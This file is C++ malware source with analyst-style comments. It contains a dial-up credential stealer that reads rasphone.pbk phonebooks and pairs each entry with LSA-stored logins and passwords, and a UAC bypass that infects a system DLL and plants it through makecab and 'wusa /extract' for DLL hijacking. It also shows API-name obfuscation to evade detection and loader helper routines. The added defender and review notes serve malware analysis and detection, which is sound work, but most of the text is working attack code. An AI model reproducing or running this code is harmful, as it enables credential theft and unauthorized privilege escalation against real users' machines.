// Counts the section headers ("[entry name]") present in two candidate
// RAS phonebook files and returns the total. The section count is what
// GetRasEntries() later iterates over, so this is a sizing pass for the
// credential-collection step.
//
// Behaviour visible in this block (useful for triage/detection):
//  - Every Win32 API is resolved at run time via LoadLibrary/GetProcAddress,
//    and most API names are assembled as stack char arrays (lstrcpyA,
//    lstrcatA, SHGetSpecialFolderPathA, wsprintfA, lstrlenA), so they appear
//    neither in the import table nor as plain strings in the binary.
//  - File 1: <system drive>\Documents and Settings\<m_lpCurrentUser>\
//            Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
//  - File 2: <CSIDL 0x23 = CSIDL_COMMON_APPDATA>\Microsoft\Network\Connections\pbk\rasphone.pbk
//  Reads of rasphone.pbk by a process that is not a RAS/dial-up component
//  are a reasonable hunting signal.
//
// Returns: number of sections read by GetPrivateProfileSectionNamesA across
//          both files. A missing file contributes 0 because the buffer is
//          zeroed before each call.
DWORD CDialupass::GetRasEntryCount()
{
	int		nCount = 0;
	char	*lpPhoneBook[2];
    char	szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1];
	// szPhoneBook1 starts as the Windows directory (e.g. "C:\WINDOWS").
	GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA");
	pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1));

	char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'};
	lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22);
	// Overwrites everything after the first backslash, turning "C:\WINDOWS"
	// into "C:\Documents and Settings\". NOTE(review): there is no check
	// that my_strchr found a backslash; if it returns NULL this writes to
	// address 1 — confirm my_strchr's failure contract.
	plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\");
	char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'};
	lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01);
	// Append the user name (m_lpCurrentUser, set elsewhere) and the fixed
	// per-user phonebook suffix. No length check against MAX_PATH+1.
	plstrcatA(szPhoneBook1, m_lpCurrentUser);
	plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");

	char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'};
	SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39);
	// 0x23 is CSIDL_COMMON_APPDATA (the all-users application-data folder).
    pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0);

	char DQeBW01[] = {'%','s','\\','%','s','\0'};
    char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
    wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
	// Format is "%s\%s". The output buffer is also passed as the first input
	// argument (overlapping source/destination), which wsprintf does not
	// guarantee to handle.
	pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");

	lpPhoneBook[0] = szPhoneBook1;
	lpPhoneBook[1] = szPhoneBook2;

	DWORD	nSize = 1024 * 4;
	char	*lpszReturnBuffer = new char[nSize];
	char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
	lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
	// The loop bound divides by sizeof(int) rather than sizeof(char*), so it
	// equals 2 only where pointers are int-sized (32-bit build); on a 64-bit
	// build it would read past lpPhoneBook.
	for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++)
	{
		memset(lpszReturnBuffer, 0, nSize);
		// Resolved on every iteration; the name is passed as a plain literal
		// here, unlike the others above.
		GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA");
		pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]);
		// Result is a double-NUL-terminated list of section names; walk it.
		for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1)
		{
			nCount++;
		}
	}
	// Mismatched deallocation: buffer was allocated with new[] (undefined
	// behaviour under the C++ standard).
	delete lpszReturnBuffer;
	return nCount;
}
	//------------------------------------------------------------------------
	// Builds the path of the loader's "signal" file: the system drive letter
	// (taken from GetWindowsDirectoryA, e.g. "C:") followed by
	// LoaderSignalFileName, which is defined elsewhere.
	// Returns NULL if GetWindowsDirectoryA fails. The string comes from
	// STR::New, so its ownership/lifetime follows that helper (presumably
	// caller-owned — confirm against STR::New).
	// Defender note: the resulting file at the drive root is an artefact
	// this component uses to coordinate with the loader; what is done with
	// it is not visible in this block.
	PCHAR GetSignalFileName()
	{
		// The function returns the signal file name


		// Determine the system drive
		char WinDir[257];

		if (pGetWindowsDirectoryA(&WinDir[0], 256) == 0)
			return NULL;
		
		// Scan to the first ':' and truncate right after it, leaving "X:".
		// NOTE(review): the scan is unbounded — a result without a colon
		// would run off the end of WinDir.
		PCHAR Tmp = WinDir;
		while (*Tmp != ':') Tmp++;
		Tmp++;
		*Tmp = 0;
			
		// Build the full name (drive + LoaderSignalFileName)
		return STR::New(2, WinDir, (PCHAR)LoaderSignalFileName);
	}
// Writes the MD5 of <system drive>\ntldr, as a hex string, into Buffer.
// This fingerprints the NT boot loader; whether the caller uses it to
// identify the OS build or to check for tampering is not visible here.
//
// Buffer     - caller-supplied output; zero-filled before use.
// BufferSize - size of Buffer; must be at least 33 (32 hex digits + NUL).
// Returns Buffer on success, NULL if the hash string is empty (file not
// readable, presumably) or Buffer is too small.
//
// Defender note: an unexpected process opening \ntldr for reading is an
// unusual event worth correlating with other boot-area activity.
char* CalcNtldrMd5(char* Buffer, DWORD BufferSize)
{
	CHAR path[MAX_PATH];

	// Keep only the drive root ("X:\"); assumes the Windows directory is
	// returned in that form.
	pGetWindowsDirectoryA(path, MAX_PATH);
	path[3] = '\0';

	m_lstrcat(path, "ntldr");

	m_memset(Buffer, 0, BufferSize);

	// `string` here is a project type (IsEmpty/t_str), not std::string.
	string md5 = MD5StrFromFileA(path);

	if (md5.IsEmpty()) return NULL;
	if (BufferSize < 33) return NULL;

	// Buffer is all zeros at this point, so lstrcat behaves as a copy.
  	m_lstrcat(Buffer, md5.t_str());

	return Buffer;
}
// Attempts to get the DLL in `module` executed with elevated rights on
// Windows 6.1/6.2 (7 / 8 and their server siblings) via the
// "wusa.exe /extract" + DLL-hijack chain that the comments below describe:
//   1. drop `module` to a temp file (the "engine DLL");
//   2. read System32\<uacTargetDll[method]>, patch it with InfectImage()
//      (presumably so that it loads the engine DLL), and save the patched
//      copy to %TEMP%;
//   3. wrap that copy in a .msu with makecab.exe and have wusa.exe extract
//      it into %WINDIR%\<uacTargetDir[method]>;
//   4. run <uacTargetApp[method]> from that directory; success is reported
//      by exit code UAC_BYPASS_MAGIC_RETURN_CODE.
// Every dropped artefact is deleted on the way out.
//
// module/szModule - bytes and size of the payload DLL.
// method          - index into the uacTargetDll/Msu/Dir/App tables
//                   (defined elsewhere; no bounds check here).
// Returns true only if step 4 produced the magic exit code.
//
// Detection notes (defender view): the chain is loud in process-creation
// and file telemetry — makecab.exe writing a .msu under %TEMP%, wusa.exe
// started with /extract pointing under %WINDIR%, and a modified copy of a
// system DLL appearing briefly in a Windows subdirectory. The /extract
// switch was removed from wusa.exe in Windows 10, which is consistent with
// the version gate below stopping at 6.2.
bool RunDllBypassUAC( const LPVOID module, int szModule, int method )
{
	bool ret = false;
	// check whether we are running on the required Windows version
    OSVERSIONINFOA Version;    
    Version.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA); 
    // NOTE: if GetVersionExA itself fails, the version gate is skipped and
    // the routine proceeds anyway.
    if( pGetVersionExA(&Version) )
    {		    
        if( Version.dwPlatformId != VER_PLATFORM_WIN32_NT ||
            Version.dwMajorVersion != 6 || !(Version.dwMinorVersion == 1 || Version.dwMinorVersion == 2) )
        {
            return false;
        }        
    }
    char engineDll[MAX_PATH];
	File::GetTempName(engineDll);

    DBG( "Saving engine DLL into the '%s'", engineDll );
    
    // write payload DLL into the temporary location
    // (WriteBufferA is expected to return the byte count written)
	if( File::WriteBufferA( engineDll, module, szModule ) != szModule ) return false;

    char targetDll[MAX_PATH], targetDllInfected[MAX_PATH];

    // targetDll         = System32\<uacTargetDll[method]>  (original)
    // targetDllInfected = %TEMP%\<uacTargetDll[method]>    (patched copy)
    pGetSystemDirectoryA( targetDll, MAX_PATH );
	pPathAppendA( targetDll, uacTargetDll[method] );

    pGetTempPathA( MAX_PATH, targetDllInfected );
	pPathAppendA( targetDllInfected, uacTargetDll[method] );

    void* data = NULL;
    DWORD dataSize = 0;

    DBG( "Reading and infecting '%s'", targetDll );

    // read hijacking dll and infect it
	data = File::ReadToBufferA( targetDll, dataSize );
    if( data )
    {
        if( InfectImage( data, dataSize, engineDll, 0 ) )
        {
            DBG( "Saving infected DLL to '%s'", targetDllInfected);

            // write infected hijacking DLL into the temporary location
			if( File::WriteBufferA( targetDllInfected, data, dataSize ) )
            {
                char msuPath[MAX_PATH];
                pGetTempPathA( MAX_PATH, msuPath );
                pPathAppendA( msuPath, uacTargetMsu[method] );

                // delete old .msu file
                pDeleteFileA(msuPath);

                DBG( "Creating MSU file '%s'", msuPath);

                // make .msu archive
                // (Exec builds the command line with printf-style %s; the
                // paths are inserted unquoted)
                Exec( 0, "makecab.exe /V1 %s %s", targetDllInfected, msuPath);
				if( File::IsExists(msuPath) )
                {        
                    char targetPath[MAX_PATH], targetDllPath[MAX_PATH];

                    // targetPath    = %WINDIR%\<uacTargetDir>\<uacTargetApp>
                    // targetDllPath = %WINDIR%\<uacTargetDir>\<uacTargetDll>
                    pGetWindowsDirectoryA( targetPath, MAX_PATH - 1 );
					pPathAppendA( targetPath, uacTargetDir[method] );
					pPathAppendA( targetPath, uacTargetApp[method] );

                    pGetWindowsDirectoryA( targetDllPath, MAX_PATH - 1 );
					pPathAppendA( targetDllPath, uacTargetDir[method] );
					pPathAppendA( targetDllPath, uacTargetDll[method] );

                    DBG( "Extracting MSU data to '%s'", targetDllPath );

                    // extract dll file into the vulnerable app directory
                    // ("%%WINDIR%%" is a literal %WINDIR% after formatting,
                    // expanded later by cmd.exe)
                    Exec(NULL, "cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\\%s", msuPath, uacTargetDir[method] );                
					if( File::IsExists(targetDllPath) )
                    {
                        DWORD exitCode = 0;

                        DBG( "Executing '%s'", targetPath );

                        // execute vulnerable application and perform DLL hijacking attack
                        if( Exec( &exitCode, "cmd.exe /C %s", targetPath ) )
                        {
                            // The exit code is the only success signal; it is
                            // presumably set by the engine DLL once loaded.
                            if( exitCode == UAC_BYPASS_MAGIC_RETURN_CODE )
                            {
                                DBG( "UAC BYPASS SUCCESS" );
                                ret = true;
                            }
                            else
                            {
                                DBG( "UAC BYPASS FAILS" );
                            }
                        }

                        // remove the planted DLL from the Windows subdirectory
                        pDeleteFileA(targetDllPath);
                    }
                    else
                        DBG( "Error while extracting '%s' from MSU archive", targetDllPath );

                    pDeleteFileA(msuPath);
                }
                else
                    DBG( "Error while creating '%s'", msuPath );
            }
        }

        MemFree(data);
    }

    // Clean up the temp-directory artefacts regardless of outcome.
    pDeleteFileA(targetDllInfected);
    pDeleteFileA(engineDll);

    return ret;
}
// Harvests dial-up/RAS entries: walks the sections of the two rasphone.pbk
// phonebook files (same two paths as GetRasEntryCount()), and for each
// entry pairs the phonebook's DialParamsUID with a credential record in
// m_PassWords[] (filled by GetLsaPasswords(), presumably from LSA secrets —
// not visible here), then hands UID, entry name, user name, password,
// phone number and device to Set().
//
// Behaviour visible in this block:
//  - API names (lstrcpyA, lstrcatA, SHGetSpecialFolderPathA, wsprintfA,
//    GetVersionExA, lstrlenA, GetPrivateProfileStringA, lstrcmpA) are built
//    as stack char arrays and resolved with GetProcAddress at run time.
//  - GetLsaPasswords() runs only on NT-family Windows with major version
//    >= 5 (Windows 2000 and later).
//  - Section names, user names and device strings are converted with
//    UTF8ToGB2312 before being stored.
// Always returns true.
//
// Defender note: rasphone.pbk reads plus LSA-secret access from the same
// unexpected process is the combination to alert on.
bool CDialupass::GetRasEntries()
{

	int		nCount = 0;
	char	*lpPhoneBook[2];
    char	szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1];
	// szPhoneBook1 starts as the Windows directory (e.g. "C:\WINDOWS").
	GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA");
	pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1));

	char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'};
	lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22);
	// Rewrites everything after the first backslash -> "C:\Documents and
	// Settings\". NOTE(review): no NULL check on the my_strchr result.
	plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\");
	char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'};
	lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01);
	// Per-user phonebook: ...\<m_lpCurrentUser>\Application Data\...\rasphone.pbk
	plstrcatA(szPhoneBook1, m_lpCurrentUser);
	plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
	char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'};
	SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39);
	// 0x23 is CSIDL_COMMON_APPDATA -> all-users phonebook.
    pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0);

	char DQeBW01[] = {'%','s','\\','%','s','\0'};
    char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
    wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
	// Format "%s\%s" with the destination also used as a source argument
	// (overlapping buffers, not guaranteed by wsprintf).
	pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
	
	lpPhoneBook[0] = szPhoneBook1;
	lpPhoneBook[1] = szPhoneBook2;
	
	
	// Version gate for the LSA step; the GetVersionExA return value is not
	// checked, so `osi` is read even if the call failed.
	OSVERSIONINFO osi;
	osi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
	char FBwWp05[] = {'G','e','t','V','e','r','s','i','o','n','E','x','A','\0'};
	GetVersionExAT pGetVersionExA=(GetVersionExAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp05);
    pGetVersionExA(&osi);
	
	if(osi.dwPlatformId == VER_PLATFORM_WIN32_NT && osi.dwMajorVersion >= 5)
	{
		// Fills m_PassWords[] / m_nRasCount (defined elsewhere).
		GetLsaPasswords();
	}	

	DWORD	nSize = 1024 * 4;
	char	*lpszReturnBuffer = new char[nSize];
	char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
	lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
	// Bound divides by sizeof(int), not sizeof(char*): correct (2) only on a
	// 32-bit build; a 64-bit build would index past lpPhoneBook.
	for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++)
	{
		memset(lpszReturnBuffer, 0, nSize);
		GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA");
		pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]);
		// Walk the double-NUL-terminated list of section (entry) names.
		for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1)
		{	
			// UTF8ToGB2312 result; the matching delete below is commented out,
			// so if it heap-allocates this leaks once per entry — confirm
			// against UTF8ToGB2312.
			char	*lpRealSection = (char *)UTF8ToGB2312(lpSection);
			char	strDialParamsUID[256];
			char	strUserName[256];
			char	strPassWord[256];
			char	strPhoneNumber[256];
			char	strDevice[256];
			memset(strDialParamsUID, 0, sizeof(strDialParamsUID));
			memset(strUserName, 0, sizeof(strUserName));
			memset(strPassWord, 0, sizeof(strPassWord));
			memset(strPhoneNumber, 0, sizeof(strPhoneNumber));
			memset(strDevice, 0, sizeof(strDevice));


			// Resolved once per entry, inside the inner loop.
			char FBwWp04[] = {'G','e','t','P','r','i','v','a','t','e','P','r','o','f','i','l','e','S','t','r','i','n','g','A','\0'};
			GetPrivateProfileStringAT pGetPrivateProfileStringA=(GetPrivateProfileStringAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp04);
			// DialParamsUID is the key that links a phonebook entry to its
			// stored credential record.
			int	nBufferLen = pGetPrivateProfileStringA(lpSection, "DialParamsUID", 0, 
				strDialParamsUID, sizeof(strDialParamsUID),	lpPhoneBook[i]);

			char FBwWp03[] = {'l','s','t','r','c','m','p','A','\0'};
			lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp03);
			if (nBufferLen > 0)//DialParamsUID=4326020    198064
			{
				// Linear search of m_PassWords[] by UID; first match wins and
				// is flagged `used` (m_nUsed counts matches).
				for(int j=0; j< (int)m_nRasCount; j++)
				{
					if(plstrcmpA(strDialParamsUID, m_PassWords[j].UID)==0)
					{
						plstrcpyA(strUserName, m_PassWords[j].login); 
						plstrcpyA(strPassWord, m_PassWords[j].pass); 
						m_PassWords[j].used=true;
						m_nUsed++;
						break;
					}
				}
			}

			// Both calls pass sizeof(strDialParamsUID) as the size of a
			// different buffer; harmless only because all five are 256 bytes.
			pGetPrivateProfileStringA(lpSection, "PhoneNumber", 0, 
				strPhoneNumber, sizeof(strDialParamsUID),	lpPhoneBook[i]);
			pGetPrivateProfileStringA(lpSection, "Device", 0, 
				strDevice, sizeof(strDialParamsUID),	lpPhoneBook[i]);
			char *lpRealDevice = (char *)UTF8ToGB2312(strDevice);
			char *lpRealUserName = (char *)UTF8ToGB2312(strUserName);
			// Store the assembled record (Set is defined elsewhere).
	 		Set(strDialParamsUID, lpRealSection, lpRealUserName, strPassWord,
 			strPhoneNumber, lpRealDevice);
//			delete	lpRealSection;
//			delete	lpRealUserName;
//			delete	lpRealDevice;
		}
	}
	// Mismatched deallocation: allocated with new[], released with delete.
	delete lpszReturnBuffer;

	return true;
}